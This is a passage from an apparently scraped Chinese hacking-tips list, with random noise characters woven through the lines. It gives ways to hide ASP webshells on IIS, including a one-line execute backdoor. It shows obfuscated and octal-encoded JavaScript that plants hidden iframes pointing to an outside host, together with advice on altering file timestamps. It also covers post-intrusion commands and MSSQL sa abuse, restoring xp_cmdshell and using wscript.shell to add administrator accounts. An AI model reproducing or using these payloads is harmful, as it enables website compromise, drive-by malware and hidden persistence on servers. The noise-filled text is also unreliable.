6 x" V1 F4 N7 S$ y0 g1、建立非标准目录:mkdir images..\ E6 C& G7 t, ^( I1 E9 F
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp2 H; e$ q! t9 ]$ @1 ?% @, V
通过web访问ASP木马:http://ip/images../news.asp?action=login- f' S8 A; ^4 s* b
如何删除非标准目录:rmdir images..\ /s
5 w2 ] O7 C2 [) P( k2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:& O( d, T6 [+ o' I
mkdir programme.asp, _5 d8 i; d- v7 c. y" i0 h! d
新建1.txt文件内容:<!--#include file=”12.jpg”-->
! i. X5 V, ?) C% `& J" H新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件# U0 i* I1 h- L5 r
attrib +H +S programme.asp& _- u6 x5 r8 s5 g" o6 B' S
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt5 Y1 o6 o$ ~, }3 {
& D5 {) C4 E0 z* {! G3 a2 r54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
4 I1 r: i4 I* c- H4 K; U9 G5 L. X然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
8 _ m6 C' G( ~/ x0 P, ?. [9 e/ I3 N& j. I! b6 v" Y
55、JS隐蔽挂马
! z: L) W8 X. K2 R8 a2 M, v1.
( g' O7 M T3 {: v' gvar tr4c3="<iframe src=ht";
3 P. e4 g; c m% _$ {. R, str4c3 = tr4c3+"tp:/";# o! ^- K: `- z. r8 @
tr4c3 = tr4c3+"/ww";: v: y B" d! S" k
tr4c3 = tr4c3+"w.tr4";% {8 P+ W2 g% ]+ B
tr4c3 = tr4c3+"c3.com/inc/m";* a" Y; Z* }& D0 K2 m% c( l
tr4c3 = tr4c3+"m.htm style="display:none"></i";( ^' k2 x6 e2 b) _- ]2 J' \
tr4c3 =tr4c3+"frame>'";
/ M6 h; M3 F7 h) V0 N( \document.write(tr4c3);- l E* [1 F( B8 q, ]
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。3 h9 d* k2 `; `+ G5 P4 Y
" \; M) C0 k4 C" y' ?8 \9 {: v2 y
2.* N [! N* o: p5 `$ d9 ^. ^
转换进制,然后用EVAL执行。如" t1 C' {; E4 O9 z& `
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
; B; `/ R: p p: k b u7 t不过这个有点显眼。: g8 [4 d' b5 d! p* r5 v% M
3.( w9 H0 Y% K' l$ \
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
4 |/ ^/ \+ w: @7 x& }# e+ }最后一点,别忘了把文件的时间也修改下。
) z0 _3 ?+ q9 I# n# p
) t& [& |; O+ {6 j1 L: @56.3389终端入侵常用DOS命令( R; N9 `7 \( j, }0 G( P
taskkill taskkill /PID 1248 /t9 g: @! H+ b! {
/ I2 Y5 f4 V, M" @& u, g
tasklist 查进程
! V; {3 U5 c( U+ _+ ]
' e x8 ?/ x* q2 v" D. scacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
- g) A8 v0 t8 e+ r `3 ]3 Eiisreset /reboot
- \) t, c* O$ u' \, rtsshutdn /reboot /delay:1 重起服务器
& e! i9 ?, }5 i ` A9 ~# u( |( x4 ~3 K
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
. _) }0 {. i+ \1 u: X2 F4 l! z$ k& v9 j7 v3 I! ?
query user 查看当前终端用户在线情况
% F- l7 p1 e, A# \7 M. a+ L s5 B6 Z0 Z+ [# r! S5 c
要显示有关所有会话使用的进程的信息,请键入:query process *
& A: k- o, z, L" R0 P8 u8 {8 C: @9 w" q; ?9 Y* w) W7 v6 x
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
' D; b n5 r- R5 O [' R# R) Z2 r
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
: `5 V, S: i* V+ K: z! F
4 g& J* b$ J/ o+ v2 |; O要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM022 o6 w/ j! C& q* l/ ?0 {
1 O" w8 b: J7 n: o
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启" U9 x& Z, H; A" r& n6 z) |
4 M0 @# k) Z7 S, P- V5 |命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统" H6 g4 B5 s/ a3 X& Q: ~* L
, @" v7 y9 w: X3 F9 |
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。+ N+ D3 b0 n7 z1 ~& @2 t) K9 ^7 S: j
& w+ `) P ?) }+ \" U: c C7 t2 b
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
( o2 ^3 A2 V6 n( J9 p
- b& \3 ?& n* Q+ Z( |56、在地址栏或按Ctrl+O,输入:
+ h7 u# @+ j/ `% K) ijavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
2 n) A" n# v! z5 D0 g+ w
" Q- U. _' |& O7 E- ?源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。, Y' ]- l; |* S: c, A6 P
. _8 M6 b* P+ w, f9 A4 I( b' v+ u2 }57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
# k+ c1 Z. I8 I' R! \1 \8 u用net localgroup administrators是可以看到管理组下,加了$的用户的。
b$ r5 c8 F" x# b" ~# ]- V* k( N9 ?1 @
, _' P/ ^" l3 T' t58、 sa弱口令相关命令
; ?; ~: ~0 U G9 ^( ~: i$ ~: j. M, l/ j7 C" B
一.更改sa口令方法:/ \% M' X) w5 N% j) D
用sql综合利用工具连接后,执行命令:) C7 g' W( t7 P
exec sp_password NULL,'20001001','sa'
* E: d: c5 Q$ D(提示:慎用!)
2 F) z3 V& C) C! {) e2 |+ L! ]1 U& C
. B8 I. ^' {) ^ F二.简单修补sa弱口令.
9 B/ D* M6 p5 c
; W1 x" L$ T' n' M方法1:查询分离器连接后执行:
0 M& ]" a1 w) }if exists (select * from
4 V3 V2 U/ E) i3 k0 j6 Q, Vdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and) c6 `# g3 {! q$ \4 j3 L5 \' e8 }
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)- j9 t( S9 o2 d5 S& Q
& W0 |3 K, {' V$ Y4 Dexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'1 N# R$ F6 q& g! z8 P& [
" B/ \, `0 K3 ?3 K7 e+ E9 ^6 t
GO
9 ~: F1 ?+ F. C8 U
- N+ ? {& Y8 b- H# B3 k& A然后按F5键命令执行完毕
) s) c0 p+ L) K1 {8 A
% D: Y7 T# Y8 r# T; z方法2:查询分离器连接后
3 ^2 S* |7 E: y% e9 p, d% T第一步执行:use master
- j3 ]7 C; Z6 y第二步执行:sp_dropextendedproc 'xp_cmdshell'
" p6 z5 K3 r- x; F然后按F5键命令执行完毕5 Z4 ~9 ]6 Q& a, O! Q
6 K5 t& [* |' ]% R, N
1 m6 i5 `) f( u- X, R/ L
三.常见情况恢复执行xp_cmdshell.5 v: Z6 _0 n, j" M6 [
1 ^7 A( e4 r$ Z, `& e1 l
" B2 b$ Q5 b& E: ?1 未能找到存储过程'master..xpcmdshell'.1 `& ^7 Z9 n6 Y8 o% ]0 ` h# g
恢复方法:查询分离器连接后,
0 o. R4 n/ `# y* u9 A第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int& o7 r% O. @& H7 N6 P3 ^) C
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
X2 C" ]- S( U+ l# {( D然后按F5键命令执行完毕# n5 w$ h5 b; }+ m4 u6 U5 a/ j$ ~
# S6 p* h8 I2 `& g
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)' [. b8 |! C" ~3 J. a; f! I
恢复方法:查询分离器连接后,
# Q3 w0 c+ t& y5 `* b第一步执行:sp_dropextendedproc "xp_cmdshell"+ J7 S+ H9 k/ o) N1 p
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
5 |9 ^( P3 h% w5 T% C然后按F5键命令执行完毕
4 b( a8 j# `; B4 k, n: f
4 p0 u! l1 [8 g# R+ q2 c3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)0 f7 J" S+ {3 S
恢复方法:查询分离器连接后,
$ i% u. P/ Y$ k6 I6 r第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
. Z/ @# ]3 Q- c$ b& y: k C( R( l- ~第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
5 S# J% u/ c8 i然后按F5键命令执行完毕
+ @0 y8 I7 {+ p( r
; V+ S i' c4 N& k$ i ?3 K6 F# u8 M, o四.终极方法.0 g. T$ [1 ^+ F& f
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
- v# k- K+ {% b, p1 C查询分离器连接后,& R# V5 d2 z/ o! H6 D# n
2000servser系统:
; T3 t0 U2 ?, H- ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'7 F- m0 @( p7 L& V m9 |$ w& K( a
& d s6 r; f. x3 j" N) \; _0 a
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
/ V3 f1 \1 P6 [. A
5 ]8 i4 Q% y! A: V' p) ^& B/ a$ kxp或2003server系统:
6 e- @$ {- f; I: U* p5 f
% p3 K* _: }0 V* _! Ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'% ^& r3 `7 ~* T6 X" \9 \1 X4 G9 h
( t1 N W/ H7 _ A, ^$ m
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'7 |- C+ [1 G: ^+ ~& r: \
|